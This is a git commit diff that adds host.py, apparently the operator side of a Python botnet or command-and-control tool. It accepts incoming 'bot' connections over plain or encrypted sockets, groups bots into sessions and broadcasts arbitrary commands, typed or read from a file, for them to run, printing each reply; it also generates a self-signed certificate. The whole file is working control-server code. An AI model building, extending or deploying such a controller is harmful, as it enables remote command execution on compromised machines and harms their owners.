summaryrefslogtreecommitdiff
path: root/host.py
diff options
context:
space:
mode:
Diffstat (limited to 'host.py')
-rw-r--r--host.py472
1 files changed, 472 insertions, 0 deletions
diff --git a/host.py b/host.py
new file mode 100644
index 0000000..cefc9da
--- /dev/null
+++ b/host.py
@@ -0,0 +1,472 @@
+import subprocess
+import threading
+import argparse
+import uuid
+import sys
+import os
+
+from typing import Generator
+from typing import Sequence
+from typing import Optional
+from typing import Union
+from typing import Tuple
+from typing import Dict
+from typing import Any
+
+from shared import DEFAULT_HOSTNAME
+from shared import DEFAULT_PORT
+from shared import DEFAULT_ENCODING
+from shared import STRICT_ENCODING_ERRORS
+from shared import Platform
+from shared import AsymmetricSocket
+from shared import SymmetricSocket
+from shared import Socket
+
+hosts = {}
+
+class Console:
+
+ if Platform.UNIX:
+ ANSI_RED = '\033[31'
+ ANSI_GREEN = '\033[32'
+ ANSI_YELLOW = '\033[33'
+ ANSI_BLUE = '\033[34'
+ ANSI_PURPLE = '\033[35'
+ ANSI_CYAN = '\033[36'
+ ANSI_WHITE = '\033[37'
+ ANSI_RESET = '\033[39m'
+ else:
+ ANSI_RED = ''
+ ANSI_GREEN = ''
+ ANSI_YELLOW = ''
+ ANSI_BLUE = ''
+ ANSI_PURPLE = ''
+ ANSI_CYAN = ''
+ ANSI_WHITE = ''
+ ANSI_RESET = ''
+
+ INFO = f'{ANSI_BLUE}[*]{ANSI_RESET} '
+ SUCCESS = f'{ANSI_GREEN}[+]{ANSI_RESET} '
+ WARNING = f'{ANSI_YELLOW}[!]{ANSI_RESET} '
+ DANGER = f'{ANSI_RED}[-]{ANSI_RESET} '
+ NULL = ''
+
+ @staticmethod
+ def write(
+ obj: Any,
+ prefix: str=INFO,
+ *,
+ color: str=ANSI_WHITE,
+ suffix: str='',
+ **kwargs
+ ) -> None:
+ print(f'{prefix}{color}{obj}{Console.ANSI_RESET}{suffix}\n', **kwargs)
+
+ @staticmethod
+ def table(
+ rows: Sequence,
+ *,
+ headers: Sequence,
+ prefix: str='',
+ suffix: str='',
+ separator: str='-',
+ margin: str=' '
+ ) -> str:
+ column_lengths = []
+ result = [prefix]
+
+ for header in headers:
+ column_lengths.append([len(str(header))])
+
+ for row in rows:
+ for index, column in enumerate(row):
+ column_lengths[index].append(len(str(column)))
+ else:
+ max_column_lengths = []
+
+ for column_length in column_lengths:
+ max_column_lengths.append(max(column_length))
+
+ for index, header in enumerate(headers):
+ result.append(str(header).ljust(max_column_lengths[index]) + margin)
+ else:
+ result.append('\n')
+
+ for max_column_length in max_column_lengths:
+ result.append(max_column_length * separator + margin)
+ else:
+ result.append('\n')
+
+ for row in rows:
+ for index, column in enumerate(row):
+ result.append(str(column).ljust(max_column_lengths[index]) + margin)
+ else:
+ result.append('\n')
+ else:
+ result.append(suffix)
+ return ''.join(result)
+
+ @staticmethod
+ def banner() -> str:
+ return ('----------------------------------------------- __ \n'
+ ' _____ __ __ _ _ ______ _______ w c(..)o (\n'
+ ' | __ \\\\ \ / / | \ | || ____||__ __| \__(-) __)\n'
+ ' | |__) |\ \_/ /______ | \| || |__ | | /\ (\n'
+ ' | ___/ \ /|______|| . ` || __| | | /(_)___)\n'
+ ' | | | | | |\ || |____ | | w /|\n'
+ ' |_| |_| |_| \_||______| |_| | \\\n'
+ '----------------------------------------------- m m')
+
+class Action:
+
+ @staticmethod
+ def args(*args, **kwargs) -> Generator[Any, None, None]:
+ for arg, cast, default in args:
+ if cast is bool:
+ yield kwargs.get(arg) is not None
+ else:
+ value = kwargs.get(arg, default)
+
+ if value == default:
+ yield value
+ else:
+ yield cast(value)
+
+ @staticmethod
+ def exit(_) -> None:
+ Console.write('May we meet in another process...', Console.NULL, end=Console.NULL)
+ sys.exit()
+
+ @staticmethod
+ def cls(_) -> None:
+ if Platform.UNIX:
+ os.system('clear')
+ else:
+ os.system('cls')
+
+ @staticmethod
+ def list(_) -> None:
+ if len(hosts) > 0:
+ rows = []
+
+ for host_id, host in hosts.items():
+ rows.append((host_id, *host.host.address()))
+
+ for bot_id, bot in host.bots.items():
+ rows.append((bot_id, *bot.address()))
+ else:
+ table = Console.table(rows, headers=host.host.address_headers())
+ Console.write(table, Console.NULL, end=Console.NULL)
+ else:
+ Console.write('NO HOSTS RUNNING', Console.WARNING)
+
+ @staticmethod
+ def listen(args: Dict[str, str]) -> None:
+ hostname, port, password, salt, pubk, privk = Action.args(('hostname', str, DEFAULT_HOSTNAME),
+ ('port', int, DEFAULT_PORT),
+ ('password', str, None),
+ ('salt', str, None),
+ ('pubk', str, None),
+ ('privk', str, None),
+ **args)
+
+ if password and salt:
+ options = {'symmetric': True, 'password': password, 'salt': salt}
+ elif pubk and privk:
+ options = {'symmetric': False, 'public_key': pubk, 'private_key': privk}
+ else:
+ options = {}
+
+ host = Host(hostname, port, **options)
+
+ if host.host.conn is None:
+ Console.write('HOST NOT STARTED', Console.DANGER)
+ else:
+ host_id = str(uuid.uuid4())
+ hosts[host_id] = host
+ threading.Thread(target=host.listen, args=(host_id,), daemon=True).start()
+ Console.write(f'HOST STARTED :: {host.host}', Console.SUCCESS)
+
+ @staticmethod
+ def who(args: Dict[str, str]) -> None:
+ id, = Action.args(('id', str, None), **args)
+
+ assert id, f'Missing attribute: {id=}'
+
+ who_conn = None
+
+ for host_id, host in hosts.items():
+ if host_id == id:
+ who_conn = host.host; break
+ else:
+ if id in host.bots:
+ who_conn = host.bots[id]; break
+
+ if who_conn is None:
+ Console.write(f'NO MATCHING ID FOUND :: {id}', Console.WARNING)
+ else:
+ rows, headers = who_conn.detailed_address()
+ table = Console.table(rows, headers=headers)
+ Console.write(table, Console.NULL, end=Console.NULL)
+
+ @staticmethod
+ def close(args: Dict[str, str]) -> None:
+ id, = Action.args(('id', str, None), **args)
+
+ assert id, f'Missing attribute: {id=}'
+
+ conn_ids = [id.strip() for id in id.split(',') if id]
+
+ for host_id, host in hosts.copy().items():
+ if host_id in conn_ids:
+ for bot_id, bot in host.bots.copy().items():
+ Action._close_conn(bot_id, bot, host.bots)
+ else:
+ Action._close_conn(host_id, host.host, hosts); conn_ids.remove(host_id)
+ Console.write(f'HOST CLOSED :: {host_id}', Console.SUCCESS, end=Console.NULL)
+ else:
+ for bot_id, bot in host.bots.copy().items():
+ if bot_id in conn_ids:
+ Action._close_conn(bot_id, bot, host.bots); conn_ids.remove(bot_id)
+ Console.write(f'BOT CLOSED :: {bot_id}', Console.SUCCESS, end=Console.NULL)
+ else:
+ for conn_id in conn_ids:
+ Console.write(f'NO MATCHING ID FOUND :: {conn_id}', Console.DANGER, end=Console.NULL)
+ else:
+ print()
+
+ @staticmethod
+ def session(args: Dict[str, str]) -> None:
+ id, remove = Action.args(('id', str, None), ('remove', bool, None), **args)
+
+ assert id, f'Missing attribute: {id=}'
+
+ conn_ids = [id.strip() for id in id.split(',') if id]
+
+ for host in hosts.values():
+ for conn_id in conn_ids:
+ if conn_id in host.bots:
+ bot = host.bots[conn_id]
+ conn_ids.remove(conn_id)
+
+ if bot.in_session:
+ if remove:
+ bot.in_session = False
+ Console.write(f'BOT REMOVED FROM SESSION :: {id}', Console.SUCCESS, end=Console.NULL)
+ else:
+ Console.write(f'BOT ALREADY IN SESSION :: {id}', Console.WARNING, end=Console.NULL)
+ else:
+ if remove:
+ Console.write(f'BOT NOT IN SESSION :: {id}', Console.WARNING, end=Console.NULL)
+ else:
+ bot.in_session = True
+ Console.write(f'BOT JOINED SESSION :: {id}', Console.SUCCESS, end=Console.NULL)
+ else:
+ for conn_id in conn_ids:
+ Console.write(f'BOT NOT FOUND :: {conn_id}', Console.DANGER, end=Console.NULL)
+ else:
+ print()
+
+ @staticmethod
+ def _close_conn(
+ conn_id: str,
+ conn: Union[Socket, SymmetricSocket, AsymmetricSocket],
+ del_from: Dict[str, Union[Socket, SymmetricSocket, AsymmetricSocket]]
+ ) -> None:
+ conn.close()
+
+ try:
+ del del_from[conn_id]
+ except KeyError:
+ pass
+class Parse:
+
+ COMMANDS = (('exit', Action.exit),
+ ('cls', Action.cls),
+ ('list', Action.list),
+ ('listen', Action.listen),
+ ('who', Action.who),
+ ('close', Action.close),
+ ('session', Action.session))
+
+ def input(self) -> None:
+ Console.write(Console.banner(), Console.NULL, color=Console.ANSI_YELLOW)
+
+ while True:
+ try:
+ command, args = self._parse()
+ found_command = False
+
+ for match, callback in self.COMMANDS:
+ if command == match:
+ callback(args)
+ found_command = True; break
+
+ if not found_command:
+ run, filepath, history = Action.args(('run', bool, None),
+ ('filepath', str, None),
+ ('history', bool, None),
+ **args)
+
+ assert isinstance(run, bool), f'Wrong type: {run=}'
+ assert isinstance(filepath, str) or filepath is None, f'Wrong type: {filepath=}'
+ assert isinstance(history, bool), f'Wrong type: {history=}'
+
+ if filepath:
+ with open(filepath,
+ 'r',
+ encoding=DEFAULT_ENCODING,
+ errors=STRICT_ENCODING_ERRORS) as rf:
+ command = rf.read()
+
+ for host in hosts.values():
+ for bot_id, bot in host.bots.items():
+ if bot.in_session:
+ try:
+ request = {'request': command, 'run': run}
+
+ if history:
+ bot.send(request, self._send_callback)
+ response = bot.recv(self._recv_callback)
+ else:
+ bot.send(request)
+ response = bot.recv()
+ except Exception:
+ Action._close_conn(bot_id, bot, host.bots)
+ raise
+ else:
+ response_text = response.get('response')
+
+ if response_text:
+ Console.write(response_text, Console.NULL)
+ else:
+ Console.write('Empty Response', Console.WARNING)
+ except Exception as err:
+ Console.write(f'[HOST] ERROR :: {err}', Console.NULL)
+
+ def _parse(self) -> Tuple[str, Dict[str, str]]:
+ try:
+ command, *args = input('>>> ').split('--')
+ except (EOFError, KeyboardInterrupt):
+ sys.exit()
+ else:
+ return (command.strip(), dict(self._parse_args(args)))
+
+ def _parse_args(self, args: Sequence) -> Generator[Tuple[str, str], None, None]:
+ for arg in args:
+ arg = arg.strip()
+
+ if arg:
+ key, *value = arg.split(' ')
+ yield (key.rstrip(), ' '.join(value).lstrip())
+
+ @staticmethod
+ def _send_callback(header_size: str, body_size: str, message_size: str) -> None:
+ assert isinstance(header_size, str), f'Wrong type: {header_size=}'
+ assert isinstance(body_size, str), f'Wrong type: {body_size=}'
+ assert isinstance(message_size, str), f'Wrong type: {message_size=}'
+
+ table = Console.table(((header_size, body_size, message_size),),
+ headers=('Header Size', 'Body Size', 'Message Size'))
+ Console.write(table, Console.NULL, end=Console.NULL)
+
+ @staticmethod
+ def _recv_callback(history: Sequence) -> None:
+ assert isinstance(history, (list, tuple)), f'Wrong type: {history=}'
+
+ table = Console.table(history, headers=('Buffer Size',
+ 'Received Data',
+ 'Message Size'))
+ Console.write(table, Console.NULL, end=Console.NULL)
+
+class Host:
+
+ def __init__(
+ self,
+ *args,
+ symmetric: Optional[bool]=None,
+ timeout: Union[int, float]=120,
+ **kwargs
+ ) -> None:
+ assert isinstance(symmetric, bool) or symmetric is None, f'Wrong type: {symmetric=}'
+ assert isinstance(timeout, (int, float)), f'Wrong type: {timeout=}'
+
+ self.symmetric = symmetric
+ self.timeout = timeout
+ self.args = args
+ self.kwargs = kwargs
+ self.bots = {}
+
+ if self.symmetric is None:
+ self.host = Socket(*self.args, server_side=True, is_host=True)
+ self.host.set_conn()
+ self.host.set_context()
+ elif self.symmetric:
+ self.host = SymmetricSocket(*self.args, server_side=True, is_host=True, **self.kwargs)
+ self.host.set_conn()
+ self.host.set_context()
+ else:
+ self.host = AsymmetricSocket(*self.args, server_side=True, is_host=True, **self.kwargs)
+ self.host.set_conn()
+ self.host.set_context()
+ self.host.set_middleware()
+
+ def listen(self, host_id: str) -> None:
+ try:
+ with self.host.conn as host_conn:
+ while True:
+ try:
+ bot_conn, (ip, port) = host_conn.accept()
+ except OSError:
+ continue
+
+ bot_conn.settimeout(self.timeout)
+
+ if self.symmetric is None:
+ bot_conn = Socket(ip, port, conn=bot_conn, server_side=True)
+ bot_conn.set_context()
+ bot_conn.set_middleware()
+ elif self.symmetric:
+ bot_conn = SymmetricSocket(ip, port, conn=bot_conn, server_side=True, **self.kwargs)
+ bot_conn.set_context()
+ bot_conn.set_middleware()
+ else:
+ bot_conn = AsymmetricSocket(ip, port, conn=bot_conn, server_side=True, **self.kwargs)
+ bot_conn.set_context()
+
+ self.bots[str(uuid.uuid4())] = bot_conn
+ except Exception:
+ for bot_id, bot in self.bots.copy().items():
+ Action._close_conn(bot_id, bot, self.bots)
+ else:
+ Action._close_conn(host_id, self.host.conn, hosts)
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument('--pubk_out')
+ parser.add_argument('--privk_out')
+ args = parser.parse_args()
+
+ if args.pubk_out and args.privk_out:
+ proc = subprocess.run(('openssl',
+ 'req',
+ '-newkey',
+ 'rsa:2048',
+ '-nodes',
+ '-keyout',
+ args.privk_out,
+ '-x509',
+ '-days',
+ '36500',
+ '-out',
+ args.pubk_out,
+ '-batch'),
+ encoding=DEFAULT_ENCODING,
+ errors=STRICT_ENCODING_ERRORS,
+ stdin=subprocess.DEVNULL,
+ stdout=subprocess.DEVNULL,
+ stderr=subprocess.DEVNULL)
+
+ assert proc.returncode == 0, f'Wrong value: {proc.returncode=}'
+ else:
+ Parse().input()